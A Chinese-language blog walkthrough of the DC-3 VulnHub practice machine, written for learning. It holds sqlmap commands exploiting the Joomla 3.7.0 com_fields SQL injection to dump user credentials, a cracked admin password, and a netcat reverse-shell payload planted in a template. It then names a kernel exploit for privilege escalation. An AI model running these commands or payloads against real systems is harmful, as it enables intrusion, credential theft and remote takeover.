DC-3vulnhub渗透测试

前言

DC:3-vulnhub渗透测试

靶机IP:192.168.1.175

KaliIP:192.168.1.124

渗透过程

nmap扫描端口:

由于这里只有一个端口80,所以直接访问80端口

所以直接访问80端口

image-20200303215131162

看到这里的登录框,并且可以得知这里有一个账号是admin

尝试用hydra爆破无果

尝试扫描目录,然后发现/adminnistor以及README.txt

这是我发现的可用信息。通过README.txt发现这里joomla 3.7.0

searchsploit查找一下

image-20200303220345138

刚开始尝试这几个exp,但是无果

但是偶然发现这里的joomla是3.7.0版本的。这里的漏洞在在于joomla 3.7.0的一个sql注入

image-20200303220658291

1
sqlmap -u "http://192.168.1.175/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

image-20200303221149698

1
sqlmap -u "http://192.168.1.175/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

image-20200303221344523

然后这里有一个#__users表,爆列名

1
sqlmap -u "http://192.168.1.175/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

image-20200303224241763

就可以把数据库数据dump出来

1
sqlmap -u "http://192.168.1.175/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "id,username,password" --dump -p list[fullordering]

image-20200303224644783

然后使用john进行爆破,得账号密码

1
admin::snoopy

然后登陆后台/administrator

Extensions -> Templates ->styles

image-20200303225616035

发现protostar是默认的模块

然后我们就可以去修改其模块

image-20200303234906208

成了,然后可以反弹shell.这里有一个很重要的信息,就是这里的操作系统是ubuntu 16.04.2

然后可以反弹shell.写入shell代码,并监听端口

1
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.124 7777 >/tmp/f");

获得tty

1
python -c "import pty; pty.spawn('/bin/bash')"

然后就是提权了,因为这里是ubuntu 16.04.2

存在一个内核漏洞CVE-2017-16995

然后剩下的提权,不会了……所以看了别的师傅的wt

https://blog.csdn.net/weixin_43583637/article/details/101554815

总结

信息收集很重要…..

Author: 我是小吴啦
Link: http://yoursite.com/2020/03/04/DC-3vulnhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.